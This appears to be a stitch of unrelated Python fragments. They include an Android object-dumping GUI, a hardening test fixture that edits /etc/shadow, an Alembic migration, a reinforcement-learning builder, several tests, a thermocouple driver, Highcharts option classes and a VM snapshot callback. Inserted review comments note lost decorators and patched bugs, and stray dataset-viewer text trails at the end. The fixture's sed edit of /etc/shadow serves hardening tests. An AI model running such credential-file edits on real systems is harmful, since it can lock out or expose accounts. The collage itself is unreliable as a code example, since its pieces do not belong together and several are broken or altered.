                click.secho('\n\t{}'.format(key), fg='blue', nl=False)
                click.secho(' => ', nl=False)
                click.secho(pairs[key], fg='bright_cyan', nl=False)
        result += '\n}\n'
        if pretty_print:
            click.secho('\n}\n', fg='red', nl=False)
        return result
    def collection_dump(self, handle, pretty_print=False, **kwargs):
        """Render a java.util.Collection instance as ``index => value`` lines."""
        result = "{}'s Collection Entries {{".format(handle)
        if pretty_print:
            click.secho("{}'s Collection Entries ".format(handle), fg='blue', nl=False)
            click.secho('{', fg='red', nl=False)
        array = self.api.collection_dump(handle)
        for i in range(0, len(array)):
            result += '\n\t{} => {}'.format(i, array[i])
            if pretty_print:
                click.secho('\n\t{}'.format(i), fg='blue', nl=False)
                click.secho(' => ', nl=False)
                click.secho(array[i], fg='bright_cyan', nl=False)
        result += '\n}\n'
        if pretty_print:
            click.secho('\n}\n', fg='red', nl=False)
        return result
    def object_get_field(self, handle, field, as_class=None):
        return self.api.object_get_field(handle, field, as_class)
    def object_search(self, clazz, stop=False):
        return self.api.object_search(clazz, stop)
    def object_dump(self, handle, as_class=None, **kwargs):
        """Dump an object: class layout plus Map/Collection contents if applicable."""
        special_render = {'java.util.Map': self.map_dump, 'java.util.Collection': self.collection_dump}
        handle = str(handle)
        if (as_class is None):
            as_class = self.object_get_classname(handle)
        result = self.class_dump(as_class, handle=handle, **kwargs)
        for clazz in special_render:
            if (not self.api.instance_of(handle, clazz)):
                continue
            if (('pretty_print' in kwargs) and kwargs['pretty_print']):
                click.secho('\n/* special type dump - {} */'.format(clazz), fg='bright_black')
            result += special_render[clazz](handle, **kwargs)
        return result
    def class_dump(self, name, handle=None, pretty_print=False, short_name=True):
        """Render class *name* as pseudo-Java source; with *handle*, include field values.

        Returns the rendered text; when *pretty_print* is set the same text is
        also echoed to the terminal with ANSI colors via click.
        """
        target = self.class_use(name)
        result = ''
        if pretty_print:
            click.secho('')
        class_name = str(target['name'])
        if ('.' in class_name):
            # Split fully-qualified name into package + simple class name.
            pkg = class_name[:class_name.rindex('.')]
            class_name = class_name[(class_name.rindex('.') + 1):]
            result += 'package {};\n\n'.format(pkg)
            if pretty_print:
                click.secho('package ', fg='blue', nl=False)
                click.secho((pkg + '\n\n'), nl=False)
        result += ('class {}'.format(class_name) + ' {\n\n')
        if pretty_print:
            click.secho('class ', fg='blue', nl=False)
            click.secho(class_name, nl=False)
            click.secho(' {\n\n', fg='red', nl=False)
        def handle_fields(fields, can_preview=None):
            # Render a group of field descriptors; preview values when possible.
            _handle = handle
            if (can_preview is None):
                can_preview = (_handle is not None)
            elif (can_preview and (_handle is None)):
                # Static fields can be read through the class name itself.
                _handle = target['name']
            append = ''
            original_class = (None if (handle is None) else self.object_get_classname(handle))
            for field in fields:
                try:
                    field = field[0]
                    t = DvmDescConverter(field['type'])
                    t = (t.short_name() if short_name else t.to_java())
                    append += '\t'
                    if pretty_print:
                        click.secho('\t', nl=False)
                    append += ('static ' if field['isStatic'] else '')
                    if pretty_print:
                        click.secho(('static ' if field['isStatic'] else ''), fg='blue', nl=False)
                    append += (t + ' ')
                    if pretty_print:
                        click.secho((t + ' '), fg='blue', nl=False)
                    value = None
                    if can_preview:
                        value = self.object_get_field(handle=_handle, field=field['name'], as_class=(name if (original_class and (original_class != name)) else None))
                    append += '{};{}\n'.format(field['name'], (' => {}'.format(value) if (value is not None) else ''))
                    if pretty_print:
                        click.secho(field['name'], fg='red', nl=False)
                        click.secho(';', nl=False)
                        if (value is not None):
                            click.secho(' => ', nl=False)
                            click.secho(value, fg='bright_cyan', nl=False)
                        click.secho('')
                except:
                    # Best-effort rendering: never abort the whole dump on one field.
                    append += '<unknown error>\n'
                    if pretty_print:
                        click.secho('<unknown error>', fg='red', nl=False)
                        click.secho()
            append += '\n'
            if pretty_print:
                click.secho('\n', nl=False)
            return append
        static_fields = target['staticFields']
        instance_fields = target['instanceFields']
        result += '\t/* static fields */\n'
        if pretty_print:
            click.secho('\t/* static fields */', fg='black')
        result += handle_fields(static_fields.values(), can_preview=True)
        result += '\t/* instance fields */\n'
        if pretty_print:
            click.secho('\t/* instance fields */', fg='black')
        result += handle_fields(instance_fields.values())
        def handle_methods(methods):
            # Render a group of method descriptors as Java-like signatures.
            append = ''
            for method in methods:
                try:
                    if short_name:
                        args_s = [DvmDescConverter(arg).short_name() for arg in method['arguments']]
                    else:
                        args_s = [DvmDescConverter(arg).to_java() for arg in method['arguments']]
                    args = ', '.join(args_s)
                    append += '\t'
                    if pretty_print:
                        click.secho('\t', nl=False)
                    append += ('static ' if method['isStatic'] else '')
                    if pretty_print:
                        click.secho(('static ' if method['isStatic'] else ''), fg='blue', nl=False)
                    retType = DvmDescConverter(method['retType'])
                    retType = (retType.short_name() if short_name else retType.to_java())
                    # Constructors carry no return type.
                    retType = ((retType + ' ') if (not method['isConstructor']) else '')
                    append += retType
                    if pretty_print:
                        click.secho(retType, fg='blue', nl=False)
                    append += (method['name'] + '(')
                    if pretty_print:
                        click.secho(method['name'], fg='red', nl=False)
                        click.secho('(', nl=False)
                    append += (args + ');\n')
                    if pretty_print:
                        for index in range(len(args_s)):
                            click.secho(args_s[index], fg='green', nl=False)
                            if (index is not (len(args_s) - 1)):
                                click.secho(', ', nl=False)
                        click.secho(');\n', nl=False)
                except:
                    append += '<unknown error>({})\n'.format(method)
                    if pretty_print:
                        click.secho('<unknown error>({})'.format(method), fg='red', nl=False)
                        click.secho('')
            return append
        constructors = target['constructors']
        instance_methods = target['instanceMethods']
        static_methods = target['staticMethods']
        result += '\t/* constructor methods */\n'
        if pretty_print:
            click.secho('\t/* constructor methods */', fg='black')
        result += handle_methods(constructors)
        result += '\n'
        if pretty_print:
            click.secho('')
        result += '\t/* static methods */\n'
        if pretty_print:
            click.secho('\t/* static methods */', fg='black')
        # NOTE: this rebinds the `name` parameter; safe only because `name`
        # is no longer needed after the field sections above.
        for name in static_methods:
            result += handle_methods(static_methods[name])
        result += '\n'
        if pretty_print:
            click.secho('')
        result += '\t/* instance methods */\n'
        if pretty_print:
            click.secho('\t/* instance methods */', fg='black')
        for name in instance_methods:
            result += handle_methods(instance_methods[name])
        result += '\n}\n'
        if pretty_print:
            click.secho('\n}\n', fg='red', nl=False)
        return result
    def appendLog(self, logstr):
        # All results land in the output pane.
        self.txtSearchData.appendPlainText(logstr)
    def classSearch(self):
        """Button handler: list classes matching the typed pattern."""
        className = self.txtClassName.text()
        if (len(className) <= 0):
            QMessageBox().information(self, 'hint', self._translate('wallBreakerForm', ''))
            return
        if (self.api == None):
            QMessageBox().information(self, 'hint', self._translate('wallBreakerForm', 'api,'))
            return
        instances = self.api.class_match(className)
        self.appendLog('\n'.join(instances))
    def classDump(self):
        """Button handler: dump the typed class's layout."""
        className = self.txtClassName.text()
        if (len(className) <= 0):
            QMessageBox().information(self, 'hint', self._translate('wallBreakerForm', ''))
            return
        if (self.api == None):
            QMessageBox().information(self, 'hint', self._translate('wallBreakerForm', 'api,'))
            return
        result = self.class_dump(className, pretty_print=False, short_name=True)
        self.appendLog(result)
    def objectSearch(self):
        """Button handler: list live instances of the typed class."""
        className = self.txtClassName.text()
        if (len(className) <= 0):
            QMessageBox().information(self, 'hint', self._translate('wallBreakerForm', ''))
            return
        if (self.api == None):
            QMessageBox().information(self, 'hint', self._translate('wallBreakerForm', 'api,'))
            return
        instances = self.object_search(className, stop=False)
        for handle in instances:
            self.appendLog('[{}]: {}'.format(handle, instances[handle]))
    def objectDump(self):
        """Button handler: dump the object at the typed (hex) handle address."""
        className = self.txtClassName.text()
        address = self.txtAddress.text()
        if (len(address) <= 0):
            QMessageBox().information(self, 'hint', self._translate('wallBreakerForm', ''))
            return
        if (self.api == None):
            QMessageBox().information(self, 'hint', self._translate('wallBreakerForm', 'api,'))
            return
        res = self.object_dump(int(address, 16), as_class=className, pretty_print=False, short_name=True)
        self.appendLog(res)
def setup_to_pass():
    """Fixture: harden password-inactivity settings, restoring originals on teardown.

    Backs up /etc/default/useradd and /etc/shadow, sets INACTIVE=30 for new
    users and a 30-day inactivity period for the root/vagrant shadow entries,
    yields, then moves the backups back into place.
    """
    shutil.copy('/etc/default/useradd', '/etc/default/useradd.bak')
    shutil.copy('/etc/shadow', '/etc/shadow.bak')
    shellexec("sed -i '/INACTIVE/ s/=.*/=30/' /etc/default/useradd")
    shellexec("sed -i -E '/(root|vagrant):/ s/0:99999:7::/0:99999:7:30:/' /etc/shadow")
    (yield None)
    # Teardown: restore the untouched configuration files.
    shutil.move('/etc/default/useradd.bak', '/etc/default/useradd')
    shutil.move('/etc/shadow.bak', '/etc/shadow')
def downgrade():
    """Alembic downgrade: recreate the stacks tables and the packages->stacks link."""
    op.create_table('stacks', sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), sa.Column('name', sa.TEXT(), autoincrement=False, nullable=False), sa.Column('description', sa.TEXT(), autoincrement=False, nullable=True), sa.Column('requirements', sa.TEXT(), autoincrement=False, nullable=True), sa.PrimaryKeyConstraint('id', name='stacks_pkey'), sa.UniqueConstraint('name', name='stacks_name_key'))
    # Many-to-many association tables to users and groups.
    op.create_table('stack_user_table', sa.Column('stack_id', sa.INTEGER(), autoincrement=False, nullable=True), sa.Column('user_id', sa.INTEGER(), autoincrement=False, nullable=True), sa.ForeignKeyConstraint(['stack_id'], ['stacks.id'], name='stack_user_table_stack_id_fkey'), sa.ForeignKeyConstraint(['user_id'], ['users.id'], name='stack_user_table_user_id_fkey'))
    op.create_table('stack_group_table', sa.Column('stack_id', sa.INTEGER(), autoincrement=False, nullable=True), sa.Column('group_id', sa.INTEGER(), autoincrement=False, nullable=True), sa.ForeignKeyConstraint(['group_id'], ['groups.id'], name='stack_group_table_group_id_fkey'), sa.ForeignKeyConstraint(['stack_id'], ['stacks.id'], name='stack_group_table_stack_id_fkey'))
    # Re-attach packages to stacks via a nullable foreign key.
    op.add_column('packages', sa.Column('stack_id', sa.INTEGER(), autoincrement=False, nullable=True))
    op.create_foreign_key('packages_stack_id_fkey', 'packages', 'stacks', ['stack_id'], ['id'])
class DrQV2Builder(builders.ActorLearnerBuilder):
    """Acme builder wiring up replay, actor and learner for the DrQ-v2 agent."""
    def __init__(self, config: drq_v2_config.DrQV2Config):
        self._config = config
    def make_replay_tables(self, environment_spec: specs.EnvironmentSpec, policy: drq_v2_networks.DrQV2PolicyNetwork) -> List[reverb.Table]:
        """Create the single uniform-sampling replay table with an SPI rate limiter."""
        del policy
        samples_per_insert_tolerance = (self._config.samples_per_insert_tolerance_rate * self._config.samples_per_insert)
        error_buffer = (self._config.min_replay_size * samples_per_insert_tolerance)
        limiter = rate_limiters.SampleToInsertRatio(min_size_to_sample=self._config.min_replay_size, samples_per_insert=self._config.samples_per_insert, error_buffer=error_buffer)
        replay_table = reverb.Table(name=self._config.replay_table_name, sampler=reverb.selectors.Uniform(), remover=reverb.selectors.Fifo(), max_size=self._config.max_replay_size, rate_limiter=limiter, signature=adders_reverb.NStepTransitionAdder.signature(environment_spec=environment_spec))
        return [replay_table]
    def make_dataset_iterator(self, replay_client: reverb.Client) -> Iterator[reverb.ReplaySample]:
        """Build a batched numpy iterator over replayed transitions."""
        dataset = datasets.make_reverb_dataset(table=self._config.replay_table_name, server_address=replay_client.server_address, batch_size=self._config.batch_size, prefetch_size=self._config.prefetch_size, transition_adder=True)
        return dataset.as_numpy_iterator()
    def make_adder(self, replay_client: reverb.Client, environment_spec: Optional[specs.EnvironmentSpec], policy: Optional[drq_v2_networks.DrQV2PolicyNetwork]) -> Optional[adders.Adder]:
        """Create the n-step transition adder used by actors to write to replay."""
        del environment_spec, policy
        return adders_reverb.NStepTransitionAdder(client=replay_client, n_step=self._config.n_step, discount=self._config.discount)
    def make_actor(self, random_key: networks_lib.PRNGKey, policy: drq_v2_networks.DrQV2PolicyNetwork, environment_spec: specs.EnvironmentSpec, variable_source: Optional[core.VariableSource]=None, adder: Optional[adders.Adder]=None) -> core.Actor:
        """Create an acting client that pulls 'policy' variables from *variable_source*."""
        del environment_spec
        assert (variable_source is not None)
        # Let the variable client pick its own device.
        device = None
        variable_client = variable_utils.VariableClient(variable_source, 'policy', device=device)
        # Block until the first set of parameters is available.
        variable_client.update_and_wait()
        return acting_lib.DrQV2Actor(policy, random_key, variable_client=variable_client, adder=adder, backend=device)
    def make_learner(self, random_key: networks_lib.PRNGKey, networks: drq_v2_networks.DrQV2Networks, dataset: Iterator[reverb.ReplaySample], logger_fn: loggers.LoggerFactory, environment_spec: specs.EnvironmentSpec, replay_client: Optional[reverb.Client]=None, counter: Optional[counting.Counter]=None) -> learning_lib.DrQV2Learner:
        """Create the DrQ-v2 learner with per-component Adam optimizers and a noise schedule."""
        del replay_client, environment_spec
        config = self._config
        critic_optimizer = optax.adam(config.learning_rate)
        policy_optimizer = optax.adam(config.learning_rate)
        encoder_optimizer = optax.adam(config.learning_rate)
        (sigma_start, sigma_end, sigma_schedule_steps) = config.sigma
        observations_per_step = int((config.batch_size / config.samples_per_insert))
        if hasattr(config, 'min_observations'):
            min_observations = config.min_observations
        else:
            min_observations = config.min_replay_size
        # Rescale learner steps to environment steps so the linear sigma
        # schedule is expressed in observations, offset by the warm-up period.
        sigma_schedule = (lambda step: optax.linear_schedule(sigma_start, sigma_end, sigma_schedule_steps)(((step + max(min_observations, config.batch_size)) * observations_per_step)))
        return learning_lib.DrQV2Learner(random_key=random_key, dataset=dataset, networks=networks, sigma_schedule=sigma_schedule, policy_optimizer=policy_optimizer, critic_optimizer=critic_optimizer, encoder_optimizer=encoder_optimizer, augmentation=config.augmentation, critic_soft_update_rate=config.critic_q_soft_update_rate, discount=config.discount, noise_clip=config.noise_clip, logger=logger_fn('learner'), counter=counter)
def load_tests():
    """Load TOML-defined folding/optimizer test cases (no-op if already loaded or failing)."""
    if fold_tests or verifier_failures:
        return
    for filename in ['test_string_functions.toml', 'test_folding.toml', 'test_optimizer.toml']:
        dump = eql.load_dump(eql.etc.get_etc_path(filename))
        for case_name, contents in sorted(dump.items()):
            full_name = '{file}:{test}'.format(file=filename, test=case_name)
            # Default to running both sensitivities when neither flag is given.
            if ('case_sensitive' not in contents) and ('case_insensitive' not in contents):
                run_sensitive = True
                run_insensitive = True
            else:
                run_sensitive = (contents.get('case_sensitive') is True)
                run_insensitive = (contents.get('case_insensitive') is True)
            case_settings = []
            if run_sensitive:
                case_settings.append(True)
            if run_insensitive:
                case_settings.append(False)
            assert (len(case_settings) > 0), '{test} is missing case_sensitive/case_insensitive'.format(test=full_name)
            extract_tests(full_name, contents, case_settings)
# NOTE(review): the line above this test originally read `.slow_integration_test`,
# a decorator whose prefix (likely `@pytest.mark.slow_integration_test`) was lost
# in extraction -- restore the real marker before running this module.
def test_clone_subgroup_exclude_archived():
    """Integration test: cloning with `-a exclude` skips archived projects."""
    # BUGFIX: the original line was `os.environ['GITLAB_URL'] = '` -- an
    # unterminated string literal (syntax error). An empty placeholder keeps
    # the module importable; restore the real GitLab URL before running.
    os.environ['GITLAB_URL'] = ''
    output = io_util.execute(['-p', '--print-format', 'json', '-a', 'exclude'], 60)
    obj = json.loads(output)
    assert (obj['children'][0]['name'] == 'Group Test')
    assert (obj['children'][0]['children'][0]['name'] == 'Subgroup Test')
    # Archived projects excluded: only the two submodule projects remain.
    assert (len(obj['children'][0]['children'][0]['children']) == 2)
    assert (obj['children'][0]['children'][0]['children'][0]['name'] == 'gitlab-project-submodule')
    assert (obj['children'][0]['children'][0]['children'][1]['name'] == 'gitlabber-sample-submodule')
def iter_slices(table, other, mode: str, keep_empty: bool):
    """Yield per-bin index slices of *table* rows overlapping *other*'s bins.

    For chromosomes missing from *table*, yields one empty Index per bin;
    otherwise yields the row indices selected by idx_ranges, skipping empty
    selections unless *keep_empty* is set.
    """
    for _chrom, bin_rows, src_rows in by_shared_chroms(other, table, keep_empty):
        if src_rows is None:
            # No source rows on this chromosome: emit an empty index per bin.
            for _ in range(len(bin_rows)):
                yield pd.Index([], dtype='int64')
            continue
        for slc, _start, _end in idx_ranges(src_rows, bin_rows.start, bin_rows.end, mode):
            indices = src_rows.index[slc].values
            if keep_empty or len(indices):
                yield indices
class ACLMixin(object):
    """Mixin adding a permissions relationship plus Pyramid-style ACL output.

    NOTE(review): the bare ``_attr`` and ``('permissions')`` lines below look
    like remnants of stripped decorators -- presumably SQLAlchemy's
    ``@declared_attr`` on ``permissions`` and ``@validates('permissions')`` on
    ``_validate_permissions``.  Confirm against the original stalker source.
    """
    _attr
    def permissions(cls):
        # Many-to-many association table between this model and Permission.
        secondary_table = create_secondary_table(cls.__name__, 'Permission', cls.__tablename__, 'Permissions')
        return relationship('Permission', secondary=secondary_table)
    ('permissions')
    def _validate_permissions(self, key, permission):
        """Reject any value that is not a stalker Permission instance."""
        # Local import, presumably to avoid a circular import at module load.
        from stalker.models.auth import Permission
        if (not isinstance(permission, Permission)):
            raise TypeError(('%s.permissions should be all instances of stalker.models.auth.Permission not %s' % (self.__class__.__name__, permission.__class__.__name__)))
        return permission
    def __acl__(self):
        """Build one (access, 'Class:name', 'action_classname') ACE per permission."""
        return [(perm.access, ('%s:%s' % (self.__class__.__name__, self.name)), ('%s_%s' % (perm.action, perm.class_name))) for perm in self.permissions]
class CmdReset(COMMAND_DEFAULT_CLASS):
    """Evennia system command: announce and trigger a server reset via the portal.

    NOTE(review): ``key`` and ``aliases`` are empty strings here -- the actual
    command name (likely ``reset``) appears to have been lost in extraction;
    confirm against upstream Evennia before relying on this block.
    """
    key = ''
    aliases = ['']
    # Usable by accounts with the 'reload' permission or Developers.
    locks = 'cmd:perm(reload) or perm(Developer)'
    help_category = 'System'
    def func(self):
        """Warn every connected session, then ask the portal to reset the server."""
        evennia.SESSION_HANDLER.announce_all(' Server resetting/restarting ...')
        evennia.SESSION_HANDLER.portal_reset_server()
class ThermoEntity:
    """SPI thermocouple reader for MAX6675- and MAX31855-style converters.

    ``dtype`` selects the decoder bound to ``self.read``:
    6675 -> :meth:`read6675`, 31855 -> :meth:`read31855`, anything else ->
    :meth:`readDummy` (and the entity is marked uninitialized).

    ``self.busy`` is a crude in-process guard against overlapping reads; it is
    not a real lock and is not thread-safe -- TODO confirm single-threaded use.
    """

    def __init__(self, busnum=0, devnum=0, dtype=6675):
        """Open SPI bus ``busnum`` device ``devnum``; fall back to an inert
        state (spi=None, busnum/devnum=-1, initialized=False) on any failure.
        """
        self.busy = False
        self.initialized = False
        self.busnum = int(busnum)
        self.devnum = int(devnum)
        self.values = 0  # last successfully decoded reading
        try:
            self.spi = spidev.SpiDev()
            self.spi.open(self.busnum, self.devnum)
            self.spi.max_speed_hz = 3900000
            self.initialized = True
        except Exception:
            # SPI device unavailable: mark the entity unusable but constructed.
            self.initialized = False
            self.devnum = -1
            self.busnum = -1
            self.spi = None
        if dtype == 6675:
            self.read = self.read6675
        elif dtype == 31855:
            self.read = self.read31855
        else:
            self.read = self.readDummy
            self.initialized = False

    def readDummy(self):
        """Placeholder reader for unsupported ``dtype`` values; always None."""
        return None

    def read6675(self):
        """Read one MAX6675 sample.

        Returns the new reading in 0.25-unit steps (presumably degC -- TODO
        confirm), the previous reading if another read is in progress, or -1
        on SPI error.
        """
        val = self.values
        try:
            if self.busy:
                # Give an in-flight read a moment to finish.
                time.sleep(0.1)
            if not self.busy:
                self.busy = True
                raw = self.spi.readbytes(2)
                # Bits 15..3 of the 16-bit frame carry the reading; LSB = 0.25.
                val = (((raw[0] << 8) | raw[1]) >> 3) * 0.25
                self.busy = False
                self.values = val
        except Exception:
            self.busy = False
            val = -1
        return val

    def read31855(self):
        """Read one MAX31855 sample as a signed 14-bit count.

        Returns None when the fault bit (bit 0 of the upper 16 bits) is set,
        the previous reading if another read is in progress, or -1 on SPI
        error.  NOTE(review): unlike read6675, the raw count is not scaled by
        0.25 here -- confirm whether that is intentional.
        """
        val = self.values
        try:
            if self.busy:
                time.sleep(0.1)
            if not self.busy:
                self.busy = True
                raw = self.spi.readbytes(4)
                # BUGFIX: the original referenced the undefined name
                # ``RawData``, raising NameError so every read returned -1.
                val = (raw[0] << 8) | raw[1]
                if val & 1:
                    # BUGFIX: clear the busy flag before bailing out on the
                    # fault bit; the original left busy=True forever, blocking
                    # all subsequent reads.
                    self.busy = False
                    return None
                val >>= 2
                if val & 8192:
                    val -= 16384  # sign-extend the 14-bit reading
                self.busy = False
                self.values = val
        except Exception:
            self.busy = False
            val = -1
        return val
def test():
    """Course-exercise check for an NER training-data answer.

    Verifies that each of ``doc1``/``doc2``/``doc3`` (defined elsewhere in the
    exercise scaffold) carries exactly two entities, and that 'PewDiePie' and
    'Alexis Ohanian' are labelled PER in doc2/doc3 respectively.  The
    assertion and feedback messages are user-facing French strings from the
    spaCy course and are deliberately left untranslated (runtime strings).
    """
    assert ((len(doc1.ents) == 2) and (len(doc2.ents) == 2) and (len(doc3.ents) == 2)), 'Attendu deux entites pour tous les exemples'
    assert any((((e.label_ == 'PER') and (e.text == 'PewDiePie')) for e in doc2.ents)), 'As-tu utilise le label pour PER correctement ?'
    assert any((((e.label_ == 'PER') and (e.text == 'Alexis Ohanian')) for e in doc3.ents)), 'As-tu utilise le label pour PER correctement ?'
    __msg__.good('Bien joue ! Apres avoir inclus les deux exemples des nouvelles entites SITE_WEB, ainsi que des entites existantes telles que PER, le modele est maintenant beaucoup plus performant.')
class TestAllowEventWithoutTransition():
    """With ``allow_event_without_transition=True`` the machine must silently
    ignore events that define no transition from the current state, staying put.
    """

    def test_send_unknown_event(self, classic_traffic_light_machine):
        """An event name the machine has never heard of leaves the state as-is."""
        machine = classic_traffic_light_machine(allow_event_without_transition=True)
        assert machine.green.is_active
        machine.send('unknow_event')
        assert machine.green.is_active

    def test_send_not_valid_for_the_current_state_event(self, classic_traffic_light_machine):
        """A known event with no transition from 'green' leaves the state as-is."""
        machine = classic_traffic_light_machine(allow_event_without_transition=True)
        assert machine.green.is_active
        machine.stop()
        assert machine.green.is_active
class OptionPlotoptionsWaterfallSonificationDefaultinstrumentoptionsMappingHighpassFrequency(Options):
    """Config accessors for a Highcharts sonification highpass-frequency mapping.

    NOTE(review): every name below is defined twice -- a getter-style def
    followed by a setter-style def.  The ``@property`` / ``@<name>.setter``
    decorators were presumably stripped during extraction; as written, the
    second def silently overwrites the first.  Confirm against the generated
    upstream source before relying on attribute-style access.
    """
    def mapFunction(self):
        return self._config_get(None)
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)
    def mapTo(self):
        return self._config_get(None)
    def mapTo(self, text: str):
        self._config(text, js_type=False)
    def max(self):
        return self._config_get(None)
    def max(self, num: float):
        self._config(num, js_type=False)
    def min(self):
        return self._config_get(None)
    def min(self, num: float):
        self._config(num, js_type=False)
    def within(self):
        return self._config_get(None)
    def within(self, value: Any):
        self._config(value, js_type=False)
class OptionSeriesAreasplinerangeSonificationDefaultinstrumentoptionsMappingFrequency(Options):
    """Config accessors for an areasplinerange sonification frequency mapping.

    NOTE(review): as in the sibling Options classes, each name is defined
    twice (getter then setter); the ``@property`` / ``@<name>.setter``
    decorators were presumably stripped during extraction, so the later def
    overwrites the earlier one.  Confirm against the generated upstream source.
    """
    def mapFunction(self):
        return self._config_get(None)
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)
    def mapTo(self):
        return self._config_get(None)
    def mapTo(self, text: str):
        self._config(text, js_type=False)
    def max(self):
        return self._config_get(None)
    def max(self, num: float):
        self._config(num, js_type=False)
    def min(self):
        return self._config_get(None)
    def min(self, num: float):
        self._config(num, js_type=False)
    def within(self):
        return self._config_get(None)
    def within(self, value: Any):
        self._config(value, js_type=False)
def GetNormal(kwargs: dict) -> OutgoingMessage:
    """Serialize a 'GetNormal' camera-capture request into an OutgoingMessage.

    Required kwarg: ``id``.  Camera geometry comes either from
    ``intrinsic_matrix`` (when present) or from ``width``/``height`` plus an
    optional ``fov`` defaulting to 60.  Wire layout: int32 id, string
    'GetNormal', bool has-matrix flag, then either the float matrix or
    width/height/fov.
    """
    utility.CheckKwargs(kwargs, ['id'])
    msg = OutgoingMessage()
    msg.write_int32(kwargs['id'])
    msg.write_string('GetNormal')
    has_matrix = 'intrinsic_matrix' in kwargs
    msg.write_bool(has_matrix)
    if has_matrix:
        msg.write_float32_list(kwargs['intrinsic_matrix'])
    else:
        msg.write_int32(kwargs['width'])
        msg.write_int32(kwargs['height'])
        msg.write_float32(kwargs.get('fov', 60))
    return msg
# NOTE(review): the two lines below were decorator remnants whose leading
# '@<task-decorator>' part was stripped during extraction; as written they were
# a SyntaxError, so they are preserved here as comments.  Restore the actual
# decorators (task registration + error callback) from the upstream source:
#   @...(name='api.vm.snapshot.tasks.vm_snapshot_cb', base=MgmtCallbackTask, bind=True)
#   @...(error_fun=_vm_snapshot_cb_alert)
def vm_snapshot_cb(result, task_id, vm_uuid=None, snap_id=None):
    """Callback finishing a VM snapshot task (create/restore/delete).

    Inspects ``result['returncode']``: on success, updates the Snapshot row
    according to the originating HTTP method (POST=create, PUT=restore,
    DELETE=delete), sets a human-readable ``result['message']`` and logs the
    success; on failure, delegates to ``_vm_snapshot_cb_failed`` and raises
    TaskException.  Returns the (mutated) ``result`` dict.
    """
    snap = Snapshot.objects.select_related('vm').get(id=snap_id)
    vm = Vm.objects.get(uuid=vm_uuid)
    action = result['meta']['apiview']['method']
    msg = result.get('message', '')
    if (result['returncode'] == 0):
        if msg:
            try:
                # Best-effort: pretty-print the backend JSON payload.
                result['detail'] = _vm_snapshot_cb_detail(json.loads(msg))
            except Exception:
                result['detail'] = ('msg=' + to_string(msg))
        else:
            result['detail'] = ''
        if (action == 'POST'):
            # Snapshot creation finished.
            assert (vm == snap.vm)
            snap.status = snap.OK
            result['message'] = 'Snapshot successfully created'
            if snap.fsfreeze:
                if ('freeze failed' in msg):
                    snap.fsfreeze = False
                    result['message'] += ' (filesystem freeze failed)'
                    # BUGFIX: the original format string used '%-%s' (two
                    # conversions for three arguments), which raised TypeError
                    # at runtime; '%s-%s' matches hostname-disk_id.
                    MonitoringBackend.vm_send_alert(vm, ('Snapshot %s of server %s-%s was created, but filesystem freeze failed.' % (snap.name, vm.hostname, snap.array_disk_id)), priority=MonitoringBackend.WARNING)
            snap.save(update_fields=('status', 'fsfreeze'))
            if (snap.define and snap.define.retention):
                # Retention policy: drop the oldest snapshots beyond the limit.
                assert (vm == snap.define.vm)
                assert (snap.disk_id == snap.define.disk_id)
                from api.vm.snapshot.views import vm_snapshot_list
                _delete_oldest(Snapshot, snap.define, vm_snapshot_list, 'snapnames', task_id, LOG_SNAPS_DELETE)
        elif (action == 'PUT'):
            # Snapshot restore finished; clear the "not ready" state on the
            # affected VM(s) -- both when restoring onto a different VM.
            if (vm != snap.vm):
                snap.vm.revert_notready()
            vm.revert_notready()
            snap.status = snap.OK
            snap.save_status()
            if result['meta']['apiview']['force']:
                # Forced restore invalidates snapshots newer than this one.
                if (snap.vm == vm):
                    Snapshot.objects.filter(vm=vm, disk_id=snap.disk_id, id__gt=snap.id).delete()
                else:
                    # Cross-VM restore: map the 1-based target disk id to the
                    # real disk id and drop all snapshots of that disk.
                    disk = vm.json_active_get_disks()[(result['meta']['apiview']['target_disk_id'] - 1)]
                    real_disk_id = Snapshot.get_real_disk_id(disk)
                    Snapshot.objects.filter(vm=vm, disk_id=real_disk_id).delete()
            result['message'] = 'Snapshot successfully restored'
        elif (action == 'DELETE'):
            assert (vm == snap.vm)
            snap.delete()
            result['message'] = 'Snapshot successfully deleted'
    else:
        # Non-zero return code from the backend task: mark failure and raise.
        _vm_snapshot_cb_failed(result, task_id, snap, action, vm=vm)
        logger.error('Found nonzero returncode in result from %s vm_snapshot(%s, %s). Error: %s', action, vm_uuid, snap, msg)
        raise TaskException(result, ('Got bad return code (%s). Error: %s' % (result['returncode'], msg)), snap=snap)
    task_log_cb_success(result, task_id, vm=vm, **result['meta'])
    return result
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.